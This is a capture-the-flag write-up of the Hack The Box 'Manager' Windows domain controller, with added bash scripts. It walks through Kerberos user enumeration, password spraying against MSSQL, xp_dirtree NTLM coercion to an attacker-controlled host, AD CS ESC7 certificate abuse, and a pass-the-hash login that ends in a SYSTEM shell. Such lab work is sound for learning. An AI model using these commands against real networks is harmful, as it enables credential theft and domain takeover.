Nmap

As always, I start with nmap. First a sweep of all 65535 TCP ports to see what is open, then a script and version scan (-sCV) of only those ports. The output of that second scan is below.
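The post only shows the second scan's output, so here is the two-step workflow as an added example (my script, not the author's): a fast full-port sweep saved in greppable format, a small parser that pulls the open ports out of it, and the targeted -sCV scan on those ports. The --min-rate value, the nmap/ output directory and the sample greppable line are my own choices.

```bash
#!/usr/bin/env bash
# Two-stage nmap: sweep all TCP ports, then run default scripts and version
# detection on just the ports that came back open.
# Added example, not the post's own script.
set -eu

# Read nmap greppable (-oG) output on stdin and print the open TCP ports as a
# sorted, comma-separated list, ready for nmap's -p option.
open_ports_from_gnmap() {
    grep -oE '[0-9]+/open/tcp' | cut -d/ -f1 | sort -un | paste -sd, -
}

# Stage 1 + stage 2 against one target. $1 = IP or host, $2 = output dir (default nmap/).
two_stage_scan() {
    target="$1"
    outdir="${2:-nmap}"
    mkdir -p "$outdir"
    # Full 65535-port sweep, no scripts, greppable output so we can parse it.
    nmap -p- --min-rate 5000 -oG "$outdir/all-ports.gnmap" "$target" >/dev/null
    ports=$(open_ports_from_gnmap < "$outdir/all-ports.gnmap")
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    echo "open ports: $ports" >&2
    # Default scripts (-sC) and version detection (-sV) on the open ports only.
    nmap -sCV -p "$ports" -oN "$outdir/targeted" "$target"
}

# Constructed sample of one -oG host line (not real scan output), used to show
# the parser without touching the network. The closed port must be filtered out.
SAMPLE_GNMAP='Host: 10.10.11.236 () Ports: 53/open/tcp//domain///, 80/open/tcp//http///, 22/closed/tcp//ssh///, 1433/open/tcp//ms-sql-s///, 49667/open/tcp//msrpc/// Ignored State: filtered (65530)'

# Usage: ./scan.sh 10.10.11.236   (with no argument, only the parser demo runs)
if [ -n "${1:-}" ]; then
    two_stage_scan "$1"
else
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports_from_gnmap
fi
```

The parser only keys on the `N/open/tcp` tokens, so filtered and closed entries never reach the second scan.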

# Nmap 7.94 scan initiated Mon Oct 23 19:48:02 2023 as: nmap -sCV -p135,139,1433,3268,3269,389,445,464,49667,49681,49682,49685,49720,53,593,5985,62109,636,64262,80,88,9389 -oN nmap/manager 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.087s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-23 18:48:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-23T18:49:41+00:00; +7h00m02s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-23T18:49:42+00:00; +7h00m02s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-23T14:47:59
|_Not valid after:  2053-10-23T14:47:59
|_ssl-date: 2023-10-23T18:49:41+00:00; +7h00m02s from scanner time.
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-23T18:49:41+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-23T18:49:42+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
62109/tcp open  msrpc         Microsoft Windows RPC
64262/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-time: 
|   date: 2023-10-23T18:49:01
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 23 19:49:41 2023 -- 1 IP address (1 host up) scanned in 98.62 seconds

That is a lot of open ports. The scan shows a Windows domain controller for manager.htb (DNS, Kerberos, LDAP/LDAPS, SMB, WinRM on 5985), plus Microsoft SQL Server 2019 on port 1433, which caught my attention since I had met it before on Archetype. Two details are worth noting for later: SMB signing is required (so relaying captured NTLM authentication to the DC's SMB is out), and the ssl-date and clock-skew results put the target about 7 hours ahead of my machine, which matters for Kerberos.

Nmap also discovered the host and domain names manager.htb and dc01.manager.htb. I added them to my /etc/hosts file:

add the hostname

Http: manager

The server on port 80 is running Microsoft IIS httpd 10.0. Navigating to the site shows a simple page that appears to be static. I tried enumerating hidden directories with gobuster, but I didn’t find anything useful.

manager webpage

LDAP: ldapsearch

Because LDAP (389, 3268) and LDAPS (636, 3269) are open, I tried anonymous enumeration with ldapsearch against both. Anonymous binds returned nothing useful; it seems valid credentials are needed:

ldapsearch

Kerberos: Kerbrute

Next, I used kerbrute to enumerate valid domain users against the KDC on port 88. I took the xato-net-10-million-usernames.txt list from SecLists and kept only the all-lowercase entries:

# grep can read the file itself; '+' instead of '*' drops empty lines, which would otherwise be sent as blank usernames
grep -E '^[a-z]+$' /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt > user.list

kerbrute userenum

Kerbrute found several valid usernames (it needs no password for this: the KDC answers differently for existing and non-existing principals). I saved them to names.txt. The username operator stood out as particularly interesting.

MSSQL: crackmapexec

With a list of usernames in hand, I tried crackmapexec against MSSQL: first operator with rockyou.txt (which failed), then each name from names.txt as its own password. That username-as-password spray yielded valid credentials for operator:
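The enumeration and the spray above, as one added example (my script, not the author's commands): filter the wordlist, run kerbrute, pull the valid names out of its log, then hand the same file to crackmapexec as both the user and password list. It assumes kerbrute's -o log keeps the same "VALID USERNAME:" lines it prints on screen; the sample log is constructed, not a real run.

```bash
#!/usr/bin/env bash
# Kerberos user enumeration with kerbrute, then a username-as-password spray
# against MSSQL with crackmapexec. Added example, not the post's own commands.
set -eu

DOMAIN="manager.htb"
DC_IP="10.10.11.236"
WORDLIST="/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt"

# Keep only all-lowercase names. Kerberos principal lookup is case-insensitive,
# so mixed-case duplicates would just waste requests against the KDC.
prepare_wordlist() {
    grep -E '^[a-z]+$' "$WORDLIST" > user.list
}

# kerbrute's VALID USERNAME lines carry user@domain; keep the user part only.
# Reads kerbrute output on stdin, prints one unique username per line.
valid_users_from_kerbrute() {
    grep 'VALID USERNAME' | grep -oE '[^[:space:]]+@[^[:space:]]+' | cut -d@ -f1 | sort -u
}

enumerate_users() {
    kerbrute userenum -d "$DOMAIN" --dc "$DC_IP" -o kerbrute.out user.list
    valid_users_from_kerbrute < kerbrute.out > names.txt
}

# Try each user with its own name as the password. --no-bruteforce pairs line N
# of -u with line N of -p instead of trying every combination, and
# --continue-on-success keeps going after the first hit.
spray_username_as_password() {
    crackmapexec mssql "$DC_IP" -u names.txt -p names.txt --no-bruteforce --continue-on-success
}

# Constructed kerbrute log (not a real run) to exercise the parser offline.
SAMPLE_KERBRUTE='2023/10/23 19:55:01 >  [+] VALID USERNAME:       operator@manager.htb
2023/10/23 19:55:02 >  [+] VALID USERNAME:       administrator@manager.htb
2023/10/23 19:55:02 >  [+] VALID USERNAME:       operator@manager.htb
2023/10/23 19:55:03 >  Done! Tested 4 usernames (3 valid) in 1.2 seconds'

# Usage: ./enum.sh run   (with no argument, only the parser demo runs)
if [ "${1:-}" = "run" ]; then
    prepare_wordlist
    enumerate_users
    spray_username_as_password
else
    printf '%s\n' "$SAMPLE_KERBRUTE" | valid_users_from_kerbrute
fi
```

Pairing the lists with --no-bruteforce is what keeps this a spray rather than a full cross-product, which matters against a domain with a lockout policy.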

crackmapexec mssql

MSSQL: mssqlclient.py

Using Impacket's mssqlclient.py, I authenticated as operator. Enabling xp_cmdshell failed because operator is not sysadmin (changing server options with sp_configure needs the ALTER SETTINGS permission, which only sysadmin and serveradmin hold). I enumerated the databases but found nothing particularly useful.

mssqlclient as operator

I then recalled the trick from the Responder box: make the target authenticate to my machine and capture the Net-NTLMv2 challenge-response. xp_dirtree is executable by ordinary logins and takes a UNC path, so with Responder listening on tun0 I ran xp_dirtree '\\$IP\notexist\file' ($IP being my tun0 address). The SQL Server service account tries to reach that share over SMB, and Responder answers and records its Net-NTLMv2 response:

steal NTLMv2 hash

I saved the captured hash to hash.txt, but hashcat (mode 5600 for Net-NTLMv2) couldn't crack it. If the SQL Server service runs as a machine or virtual account, its password is long and random and this is expected. The capture is a challenge-response, not an NT hash, so it can't be used for pass-the-hash either, and with SMB signing required on the DC it can't be relayed to SMB.

MSSQL: xp_dirtree

I was stuck until I came across this blog post explaining that xp_dirtree can also list directories (its depth and file-inclusion arguments). I pointed it at the IIS web root, which revealed a backup archive named website-backup-27-07-23-old.zip:

xp_dirtree traverse

Since it sits in the web root, IIS serves it on port 80, so I downloaded it with curl.
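The three MSSQL steps above (the xp_dirtree coercion, the directory listing, and the download of the backup) as one added example, my script rather than the author's commands. It assumes an Impacket version whose mssqlclient.py has the -file option, Responder started separately in another terminal with sudo responder -I tun0, the operator password exported as MSSQL_PASS, and the default IIS web root C:\inetpub\wwwroot (the post does not name the path).

```bash
#!/usr/bin/env bash
# MSSQL with a low-privileged login: (1) coerce the SQL Server service account
# into authenticating to us over SMB via xp_dirtree, (2) use xp_dirtree as a
# directory lister, (3) fetch the backup it exposed over HTTP.
# Added example, not the post's own script.
set -eu

TARGET="10.10.11.236"
MSSQL_USER="operator"

# T-SQL that makes SQL Server open a UNC path we control. The share need not
# exist: the SMB authentication attempt is all we want.
coercion_sql() {
    printf '%s\n' "EXEC master.dbo.xp_dirtree '\\\\$1\\notexist\\file';"
}

# T-SQL that lists one directory: depth 1, files included (third argument).
# It runs with the service account's file system rights, not operator's.
dirtree_sql() {
    printf '%s\n' "EXEC master.dbo.xp_dirtree '$1', 1, 1;"
}

# Our VPN address; the target must be able to reach it on 445/tcp.
attacker_ip() {
    ip -4 -o addr show tun0 | awk '{print $4}' | cut -d/ -f1
}

# Feed a T-SQL file to Impacket's mssqlclient.py (assumes a version with -file).
run_sql_file() {
    : "${MSSQL_PASS:?export MSSQL_PASS with the operator password first}"
    mssqlclient.py "$MSSQL_USER:$MSSQL_PASS@$TARGET" -file "$1"
}

coerce_auth() {
    # Responder (sudo responder -I tun0, in another terminal) answers the SMB
    # connection and prints the Net-NTLMv2 response; crack with hashcat -m 5600.
    coercion_sql "$(attacker_ip)" > coerce.sql
    run_sql_file coerce.sql
}

list_webroot() {
    dirtree_sql 'C:\inetpub\wwwroot' > list.sql
    run_sql_file list.sql
}

download_backup() {
    # Anything under the web root is served by IIS on port 80.
    curl -fO "http://$TARGET/website-backup-27-07-23-old.zip"
}

# Usage: ./mssql.sh run   (with no argument, only the SQL builders run)
if [ "${1:-}" = "run" ]; then
    coerce_auth
    list_webroot
    download_backup
else
    coercion_sql 10.10.14.5
    dirtree_sql 'C:\inetpub\wwwroot'
fi
```

The point of keeping the T-SQL in small builder functions is the escaping: the UNC path needs two leading backslashes to survive both the shell and the SQL string literal, which is the usual reason this coercion "silently" does nothing.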

download zipfile

Evil-winrm: raven

After unzipping, there were many files inside. I searched for anything containing the string “pass” using grep -iR "pass". One file contained a password that looked like it belonged to a user named raven.

raven credentials

I used evil-winrm to authenticate with it over WinRM (port 5985 from the scan), and it worked!

login as raven

ADCS: ESC7

I got stuck again, so I asked in the Hack The Box community Discord. Someone mentioned a potential certificate attack, which led me to a post by 0xdf (blog link). This box seems vulnerable to one of those AD CS certificate attacks.

I transferred Certify.exe to the target and ran its find command. The output showed that the current user, raven, has the ManageCA right on the CA.

check the attack vector

According to SpecterOps, ManageCA (also called “CA Administrator”) lets a user modify important CA configurations.

ManageCA (aka “CA Administrator”) is a permission that grants a principal the ability to perform “Administrative” CA actions, including the modification of persistent configuration data.

Following the ESC7 steps described in HackTricks and 0xdf’s writeup, I used Certipy as raven to obtain a certificate for the Administrator account. The chain those sources describe: with ManageCA, make raven a certificate officer and enable the SubCA template; request a SubCA certificate carrying Administrator's UPN, which the CA denies but leaves pending; approve that pending request with the new officer right; and retrieve the issued certificate.

retrieve administrator certificates

This produced an administrator.pfx file (and a matching .key file). I then transferred administrator.pfx and Rubeus.exe to the target. Kerberos tolerates only a few minutes of clock skew and the scan showed 7 hours, so before running Rubeus I synced my machine’s clock with the target by running sudo ntpdate $IP. Finally, I ran:

Rubeus.exe asktgt /user:administrator /certificate:<location of administrator.pfx> /getcredentials /show /nowrap

The end of the output includes the Administrator NTLM hash (with /getcredentials, Rubeus follows the PKINIT logon with a U2U request that returns the account's NT hash).

administrator NTLM hash

PsExec

With the Administrator hash in hand, I used psexec.py with pass-the-hash (-hashes :<NT hash>, leaving the LM half empty) and got a shell as NT AUTHORITY\SYSTEM. It worked!

login as nt authority\\system